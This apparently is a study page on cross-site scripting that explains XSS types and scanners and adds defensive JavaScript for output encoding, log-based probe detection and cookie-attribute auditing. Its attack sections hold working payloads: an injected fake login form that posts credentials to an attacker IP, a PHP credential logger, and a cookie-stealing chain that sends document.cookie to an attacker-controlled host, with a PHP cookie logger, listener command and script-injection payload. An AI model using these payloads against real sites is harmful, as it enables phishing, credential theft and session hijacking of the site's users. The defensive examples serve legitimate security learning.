XSS
Cross-Site Scripting (XSS) is among the most common web vulnerabilities.
It occurs when a web application takes user input, embeds it in the HTML that the back-end returns to the browser, and fails to properly sanitize or encode it. An attacker can then inject JavaScript through input fields, and the victim's browser executes it in the context of the site.
XSS Attacks
Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to its users. Stored XSS is persistent: the payload is saved on the server and affects every user who visits the page. Reflected and DOM-based XSS are non-persistent: the payload is not stored on the server and is only temporary. Reflected XSS is processed by the server and echoed back, while DOM-based XSS is processed entirely on the client side and never reaches the back-end server.
| Type | Description |
|---|---|
| Stored XSS | Most critical; occurs when user input is stored in the back-end database and later rendered to other users. |
| Reflected XSS | Occurs when user input is displayed after being processed by the back-end server. |
| DOM XSS | Occurs when user input is shown directly in the browser and is processed completely on the client side. |
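All three types share the same root cause: untrusted input reaching an HTML sink without encoding. The following added example (not from the original page) shows the fix on the server-side rendering path in JavaScript: a context-aware HTML encoder and a vulnerable renderer next to its hardened form, checked against the two payload shapes quoted later on this page. The `renderUnsafe`/`renderSafe` functions and the sample payloads are constructed for illustration.

```javascript
// Added example: HTML output encoding that neutralises the page's own payloads.
// Characters that are significant in HTML text and attribute contexts (OWASP set).
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
};

// Encode untrusted input for an HTML text or double-quoted attribute context.
function escapeHtml(input) {
  return String(input).replace(/[&<>"'\/]/g, (ch) => HTML_ENTITIES[ch]);
}

// Vulnerable rendering (hypothetical): the search term is echoed into the page unchanged.
function renderUnsafe(term) {
  return `<input id="urlform" value='${term}'><p>Results for ${term}</p>`;
}

// Hardened rendering: every untrusted value is encoded and attributes are double-quoted.
function renderSafe(term) {
  const t = escapeHtml(term);
  return `<input id="urlform" value="${t}"><p>Results for ${t}</p>`;
}

// True when the markup still contains a live <script> tag (case-insensitive).
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input: the two payload shapes shown on this page, with a placeholder host.
const SAMPLE_PAYLOADS = [
  `'><script>document.write('x')</script><!--`,
  `"><script src=http://ATTACKER_HOST_PLACEHOLDER/script.js></script>`,
];

// For each payload, report whether a script tag survives the unsafe and the safe renderer.
function demo() {
  return SAMPLE_PAYLOADS.map((p) => ({
    unsafe: containsScriptTag(renderUnsafe(p)),
    safe: containsScriptTag(renderSafe(p)),
  }));
}

console.log(demo()); // unsafe: true for both, safe: false for both
```

Encoding must match the context the value lands in: `escapeHtml` is correct for text and quoted attributes, but a value placed inside a `<script>` block, a URL or a CSS property needs the encoder for that context instead.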
XSS Discovery
Use automated scanners such as Nessus, Nikto, Burp Suite or ZAP, or open-source XSS tools:
- XSStrike
- BruteXSS
- XSSer
Manually test by submitting XSS payloads into input elements and HTTP headers; a large payload collection is at https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md
Review the source code to understand how input is handled, then write custom payloads for that context.
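The same probing is visible from the server side. As an added example (not from the original page), this JavaScript function scans web-server access-log lines for XSS probes, decoding the request target repeatedly so double-encoded payloads are not missed. The log lines are constructed samples in Apache combined-log style, and the indicator list is a heuristic, not a complete signature set.

```javascript
// Added example: flag XSS probes in access logs. Sample lines are constructed.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=%27%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 640',
  '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%2522%253E%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 640',
  '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "POST /login HTTP/1.1" 302 0',
];

// Indicators checked against the decoded request. The event-handler pattern is
// limited to a few common handlers to keep false positives low.
const INDICATORS = [
  ['script tag', /<script\b/i],
  ['event handler', /\bon(error|load|click|mouseover|focus)\s*=/i],
  ['javascript: URL', /javascript:/i],
  ['inline element', /<(img|svg|iframe|body)\b/i],
  ['cookie access', /document\.cookie/i],
];

// Decode repeatedly (max 3 rounds) so double-encoded probes are caught;
// stop on malformed percent sequences instead of throwing.
function fullyDecode(s) {
  let cur = s.replace(/\+/g, ' ');
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Pull the client IP and request target out of one combined-log line.
function parseLogLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|PUT|HEAD) (\S+) HTTP\/[\d.]+"/);
  return m ? { ip: m[1], path: m[2] } : null;
}

// Return one finding per line that carries at least one indicator.
function findXssProbes(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    const decoded = fullyDecode(req.path);
    const hits = INDICATORS.filter(([, re]) => re.test(decoded)).map(([name]) => name);
    if (hits.length) findings.push({ ip: req.ip, path: decoded, indicators: hits });
  }
  return findings;
}

console.log(JSON.stringify(findXssProbes(SAMPLE_LOG), null, 2));
```

Reflected and stored probes show up in the request line this way; DOM-based payloads placed after a `#` fragment never reach the server, so client-side telemetry is needed to see those.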
XSS Attacks
Defacing is possible if we can change the look and feel of the website, even changing its text, and it can be used for a phishing attack.
# Create Login page
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>
Payload
'><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.24:8888><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
Simple PHP script
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>
Session Hijacking
It is possible to use JavaScript to collect a victim's cookies, send them to the attacker's own server and log in with them. Sometimes we can't see how our input is handled, which is called Blind XSS; we can still check for the vulnerability by making the payload send an HTTP request to a server we control.
# Write this line to script.js
new Image().src='http://PWNIP:PWNPO/index.php?c='+document.cookie;
# Host index.php
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
# Start listener
php -S 0.0.0.0:8080
# Execute payload
"><script src=http://PWNIP:PWNPO/script.js></script>
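The exfiltration above works only because `document.cookie` exposes the session cookie to script. As an added example (not from the original page), this JavaScript audit parses `Set-Cookie` headers and reports cookies that lack the attributes which limit this attack: `HttpOnly` keeps the cookie out of `document.cookie`, `Secure` keeps it off plaintext HTTP, and `SameSite` limits cross-site sending. The sample headers are constructed.

```javascript
// Added example: audit Set-Cookie headers for the attributes that blunt cookie theft.
// Parse one Set-Cookie value into name, value and a lower-cased attribute map.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name, ...valueParts] = parts[0].split('=');
  const attrs = {};
  for (const part of parts.slice(1)) {
    const idx = part.indexOf('=');
    const key = (idx === -1 ? part : part.slice(0, idx)).trim().toLowerCase();
    attrs[key] = idx === -1 ? true : part.slice(idx + 1).trim();
  }
  return { name: name.trim(), value: valueParts.join('='), attrs };
}

// Return the findings for one cookie; an empty list means all three protections are set.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!('httponly' in c.attrs)) findings.push('missing HttpOnly: readable via document.cookie');
  if (!('secure' in c.attrs)) findings.push('missing Secure: sent over plaintext HTTP');
  const ss = typeof c.attrs.samesite === 'string' ? c.attrs.samesite.toLowerCase() : null;
  if (ss === null) findings.push('missing SameSite');
  else if (ss === 'none') findings.push('SameSite=None: sent on cross-site requests');
  return { name: c.name, findings };
}

// Constructed sample headers: a weak session cookie, a hardened one, and a third-party cookie.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'tracking=xyz; Path=/; Secure; SameSite=None',
];

function auditAll(headers) {
  return headers.map(auditSetCookie);
}

console.log(JSON.stringify(auditAll(SAMPLE_HEADERS), null, 2));
```

`HttpOnly` does not stop XSS itself: injected script can still act on the site as the victim, so it is a damage-limiting control, not a substitute for the output encoding covered earlier.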